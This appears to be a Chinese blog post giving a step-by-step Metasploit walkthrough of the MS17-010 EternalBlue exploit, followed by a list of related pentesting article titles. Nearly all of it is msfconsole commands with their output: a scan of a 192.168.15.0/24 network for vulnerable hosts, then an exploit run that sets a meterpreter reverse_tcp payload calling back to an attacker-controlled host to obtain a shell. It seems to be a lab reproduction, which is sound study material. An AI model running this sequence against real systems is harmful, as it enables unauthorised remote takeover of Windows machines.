- 使用kali 对网段进行扫描,加载扫描模块:
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.15.1/24
rhosts => 192.168.15.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50
threads => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
扫描结果:可以看出192.168.15.164主机可以利用
- 加载攻击模块,攻击拿shell:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //这个可以不写
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.15.164
rhosts => 192.168.15.164
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.15.174
lhost => 192.168.15.174
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
拿到shell:
详细解决方案
metasploit对 ms17-010永恒之蓝的漏洞利用
热度:28 发布时间:2023-12-16 10:39:33.0
相关解决方案
- kali 输入 msfconsole 启动报错:/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87
- metasploit (一)
- metasploit对 ms17-010永恒之蓝的漏洞利用
- MS17-010之EquationExploit
- MS17-010漏洞复现(x32)以及分析
- 使用msf(Metasploit Framework)检测MS17-010(永恒之蓝)
- 永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集
- 笔记: kali metasploit ms17_010 入侵 win7
- kali metasploit 木马入侵windows和Android
- metasploit smd扫描系统信息
- 2022-渗透测试-信息收集-Metasploit(基于FTP协议)
- 2022-渗透测试-信息收集-Metasploit(基于SSH协议)
- 2022-渗透测试-信息收集-Metasploit(基于SMB协议)
- 2022-渗透测试-信息收集-Metasploit(基于SNMP协议)
- 2022-渗透测试-信息收集-Metasploit(基于TCP协议)
- Metasploit-进阶用户密码与mimikatz模块kiwi模块
- Metasploit-MS17-010(永恒之蓝 EternalBlue )复现
- Metasploit-EclipsedWing 黯淡羽翼(MS08_067) 复现
- 渗透测试常用工具-Metasploit
- metasploitable2在进行SQL注入时报错——Table 'metasploit.accounts' doesn't exit
- Metasploit(3) 渗透测试之通过客户端进行渗透
- Metasploit(2) 渗透测试之信息收集
- windows上 安装 Metasploit
- metasploit(MSF)渗透平台命令大全